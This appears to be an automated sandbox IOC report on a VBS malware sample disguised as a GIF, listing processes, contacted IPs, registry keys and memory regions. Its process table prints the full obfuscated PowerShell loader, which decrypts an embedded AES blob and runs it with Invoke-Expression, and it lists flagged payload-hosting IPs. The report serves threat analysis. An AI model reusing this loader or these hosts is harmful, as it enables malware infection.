IOC Report
creatednewwaterbottleforme.gIF.vbs

loading gif

Files

File Path
Type
Category
Malicious
creatednewwaterbottleforme.gIF.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duy2jxni.myc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1xgj3oo.ln1.ps1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\creatednewwaterbottleforme.gIF.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://192.3.176.174/60/WDER.txt
192.3.176.174
http://192.3.176.174
unknown
http://nuget.org/NuGet.exe
unknown
http://198.46.176.133/Upload/vbs.jpeg
198.46.176.133
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://192.3.176.174(
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
http://198.46.176.133
unknown
There are 5 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
192.3.176.174
unknown
United States
198.46.176.133
unknown
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
194C19E2000
heap
page read and write
12411AA0000
trusted library allocation
page read and write
12410054000
heap
page read and write
194C19CD000
heap
page read and write
7FFD34750000
trusted library allocation
page read and write
12410020000
heap
page read and write
194C38E0000
heap
page read and write
194C3C2D000
heap
page read and write
194C19D9000
heap
page read and write
124119B0000
heap
page read and write
B67073000
stack
page read and write
29617FB000
stack
page read and write
194C1B20000
heap
page read and write
194C37DA000
heap
page read and write
12412294000
trusted library allocation
page read and write
7FFD345E6000
trusted library allocation
page read and write
194C37CB000
heap
page read and write
194C3B43000
heap
page read and write
194C3B30000
heap
page read and write
194C37B7000
heap
page read and write
7FFD345EC000
trusted library allocation
page execute and read and write
29615FE000
stack
page read and write
7FFD34530000
trusted library allocation
page read and write
194C3B73000
heap
page read and write
194C3925000
heap
page read and write
194C38AD000
heap
page read and write
7FFD347C0000
trusted library allocation
page read and write
194C37AE000
heap
page read and write
194C3B1A000
heap
page read and write
194C3B34000
heap
page read and write
194C3925000
heap
page read and write
12412071000
trusted library allocation
page read and write
194C37BA000
heap
page read and write
B6767E000
stack
page read and write
7FFD34800000
trusted library allocation
page read and write
1241004B000
heap
page read and write
194C3904000
heap
page read and write
194C3925000
heap
page read and write
7FFD346F0000
trusted library allocation
page execute and read and write
12412718000
trusted library allocation
page read and write
7FFD34870000
trusted library allocation
page read and write
7FFD34890000
trusted library allocation
page read and write
194C3B1C000
heap
page read and write
7FFD34616000
trusted library allocation
page execute and read and write
194C37C6000
heap
page read and write
7FFD346D0000
trusted library allocation
page read and write
194C38A1000
heap
page read and write
194C3B6E000
heap
page read and write
194C3B19000
heap
page read and write
7FFD34534000
trusted library allocation
page read and write
B671FF000
stack
page read and write
7FFD347B0000
trusted library allocation
page read and write
12414F6E000
trusted library allocation
page read and write
194C19D1000
heap
page read and write
194C38E5000
heap
page read and write
1242235A000
trusted library allocation
page read and write
194C37B3000
heap
page read and write
194C37A2000
heap
page read and write
194C3904000
heap
page read and write
B674F6000
stack
page read and write
194C3B43000
heap
page read and write
194C37D7000
heap
page read and write
B670FD000
stack
page read and write
194C37F6000
heap
page read and write
7FFD34740000
trusted library allocation
page read and write
124124FD000
trusted library allocation
page read and write
12411A10000
trusted library allocation
page read and write
194C3B71000
heap
page read and write
194C1B25000
heap
page read and write
1242A162000
heap
page read and write
7FFD34730000
trusted library allocation
page read and write
7FFD347E0000
trusted library allocation
page read and write
7FFD34830000
trusted library allocation
page read and write
1242A13A000
heap
page read and write
194C38F5000
heap
page read and write
194C37EC000
heap
page read and write
2960FFE000
stack
page read and write
194C39E0000
heap
page read and write
194C3B20000
heap
page read and write
12411A60000
trusted library allocation
page read and write
194C3B6D000
heap
page read and write
12411EA0000
heap
page read and write
194C37BA000
heap
page read and write
12413B6E000
trusted library allocation
page read and write
194C37F7000
heap
page read and write
1242A260000
heap
page execute and read and write
194C3B23000
heap
page read and write
7FFD34760000
trusted library allocation
page read and write
12411A67000
trusted library allocation
page read and write
B6717E000
stack
page read and write
194C39DB000
heap
page read and write
B676FE000
stack
page read and write
194C3B91000
heap
page read and write
194C39D6000
heap
page read and write
1240FFF0000
heap
page read and write
194C3B1C000
heap
page read and write
12412626000
trusted library allocation
page read and write
124220E0000
trusted library allocation
page read and write
194C3B24000
heap
page read and write
7FFD348A0000
trusted library allocation
page read and write
7FFD34532000
trusted library allocation
page read and write
194C1A48000
heap
page read and write
12411EB0000
heap
page read and write
194C37A7000
heap
page read and write
194C3350000
heap
page read and write
194C19D8000
heap
page read and write
194C3B7E000
heap
page read and write
1242A7C0000
trusted library section
page read and write
1241456E000
trusted library allocation
page read and write
194C1A48000
heap
page read and write
194C39D0000
heap
page read and write
12411A20000
heap
page readonly
194C3A91000
heap
page read and write
194C37D2000
heap
page read and write
B6777E000
stack
page read and write
1240FFD0000
heap
page read and write
B677FE000
stack
page read and write
12422071000
trusted library allocation
page read and write
194C3B4F000
heap
page read and write
7FFD347A0000
trusted library allocation
page read and write
7FFD34860000
trusted library allocation
page read and write
194C38CD000
heap
page read and write
194C37F6000
heap
page read and write
7FFD346EA000
trusted library allocation
page read and write
7FFD34790000
trusted library allocation
page read and write
1242A290000
heap
page read and write
194C37BA000
heap
page read and write
194C3919000
heap
page read and write
194C3890000
heap
page read and write
1242A070000
heap
page read and write
194C3B26000
heap
page read and write
B6824E000
stack
page read and write
7FFD34650000
trusted library allocation
page execute and read and write
194C3B90000
heap
page read and write
7FFD347D0000
trusted library allocation
page read and write
7FFD34780000
trusted library allocation
page read and write
7FFD3453D000
trusted library allocation
page execute and read and write
7FFD348C0000
trusted library allocation
page read and write
194C38EC000
heap
page read and write
7FFD345E0000
trusted library allocation
page read and write
194C39E0000
heap
page read and write
194C39EC000
heap
page read and write
194C3901000
heap
page read and write
194C3B12000
heap
page read and write
194C3AFD000
heap
page read and write
194C3B2D000
heap
page read and write
194C1970000
heap
page read and write
7FFD348F0000
trusted library allocation
page read and write
194C3792000
heap
page read and write
194C3A90000
heap
page read and write
B682CD000
stack
page read and write
7FFD34880000
trusted library allocation
page read and write
194C38B0000
heap
page read and write
194C37F4000
heap
page read and write
12411A30000
trusted library allocation
page read and write
2960CF9000
stack
page read and write
194C1A48000
heap
page read and write
194C379B000
heap
page read and write
7FFD34810000
trusted library allocation
page read and write
7FFD34533000
trusted library allocation
page execute and read and write
1242A0C2000
heap
page read and write
12410025000
heap
page read and write
B6737E000
stack
page read and write
194C19D2000
heap
page read and write
1242A0D8000
heap
page read and write
29616FF000
stack
page read and write
12422489000
trusted library allocation
page read and write
7FFD348EA000
trusted library allocation
page read and write
B67479000
stack
page read and write
B66DDE000
stack
page read and write
7FFD34550000
trusted library allocation
page read and write
194C3C2C000
heap
page read and write
7FFD34720000
trusted library allocation
page execute and read and write
124120F3000
trusted library allocation
page read and write
124119F0000
trusted library allocation
page read and write
194C39E0000
heap
page read and write
12410061000
heap
page read and write
194C3B18000
heap
page read and write
124100D0000
heap
page read and write
194C39D5000
heap
page read and write
1242A0BF000
heap
page read and write
194C3B4D000
heap
page read and write
194C39E0000
heap
page read and write
194C19CE000
heap
page read and write
1242A0BD000
heap
page read and write
1242A370000
heap
page read and write
7FFD34700000
trusted library allocation
page execute and read and write
194C38C8000
heap
page read and write
194C38C5000
heap
page read and write
7FFD34850000
trusted library allocation
page read and write
1242A3EE000
heap
page read and write
194C3912000
heap
page read and write
1242A0BA000
heap
page read and write
194C3AF7000
heap
page read and write
194C19D2000
heap
page read and write
12410082000
heap
page read and write
194C391D000
heap
page read and write
12412060000
heap
page execute and read and write
194C3B43000
heap
page read and write
7FFD347F0000
trusted library allocation
page read and write
2960DFE000
stack
page read and write
194C3925000
heap
page read and write
1242A144000
heap
page read and write
B6727C000
stack
page read and write
12422080000
trusted library allocation
page read and write
1242A3DD000
heap
page read and write
194C38E9000
heap
page read and write
194C39F8000
heap
page read and write
194C39D8000
heap
page read and write
194C39CF000
heap
page read and write
7FFD3458C000
trusted library allocation
page execute and read and write
B6787C000
stack
page read and write
B675F9000
stack
page read and write
194C38DD000
heap
page read and write
1241008A000
heap
page read and write
194C3790000
heap
page read and write
1242A267000
heap
page execute and read and write
194C3B35000
heap
page read and write
124100CA000
heap
page read and write
194C37BF000
heap
page read and write
194C1870000
heap
page read and write
194C3891000
heap
page read and write
12412779000
trusted library allocation
page read and write
194C39E6000
heap
page read and write
12412632000
trusted library allocation
page read and write
B67577000
stack
page read and write
194C3B1C000
heap
page read and write
194C3AFD000
heap
page read and write
194C19D9000
heap
page read and write
B673FD000
stack
page read and write
7FFD34840000
trusted library allocation
page read and write
194C38B5000
heap
page read and write
12422369000
trusted library allocation
page read and write
1241316E000
trusted library allocation
page read and write
7FFD3454B000
trusted library allocation
page read and write
7FFD346E1000
trusted library allocation
page read and write
7FFD348B0000
trusted library allocation
page read and write
194C3914000
heap
page read and write
194C39F8000
heap
page read and write
194C39E2000
heap
page read and write
194C3B25000
heap
page read and write
194C39DD000
heap
page read and write
194C38F8000
heap
page read and write
7FFD34712000
trusted library allocation
page read and write
29612FE000
stack
page read and write
B672FE000
stack
page read and write
1242A170000
heap
page execute and read and write
7FFD34820000
trusted library allocation
page read and write
194C3925000
heap
page read and write
194C1950000
heap
page read and write
194C3B43000
heap
page read and write
12410086000
heap
page read and write
7FFD34770000
trusted library allocation
page read and write
124100A2000
heap
page read and write
194C3B43000
heap
page read and write
7DF404580000
trusted library allocation
page execute and read and write
194C37F6000
heap
page read and write
12411AB0000
heap
page read and write
194C19A7000
heap
page read and write
194C3791000
heap
page read and write
7FFD34540000
trusted library allocation
page read and write
194C37F6000
heap
page read and write
194C3B15000
heap
page read and write
194C3B31000
heap
page read and write
194C39F8000
heap
page read and write
194C19A0000
heap
page read and write
29614FE000
stack
page read and write
1242A670000
heap
page read and write
194C39D0000
heap
page read and write
194C37EF000
heap
page read and write
1240FFC0000
heap
page read and write
194C39E7000
heap
page read and write
194C37DF000
heap
page read and write
194C3925000
heap
page read and write
12411AB4000
heap
page read and write
194C3B1F000
heap
page read and write
29611FF000
stack
page read and write
7FFD348F4000
trusted library allocation
page read and write
12410040000
heap
page read and write
2960EFE000
stack
page read and write
1241596E000
trusted library allocation
page read and write
194C37E3000
heap
page read and write
There are 272 hidden memdumps, click here to show them.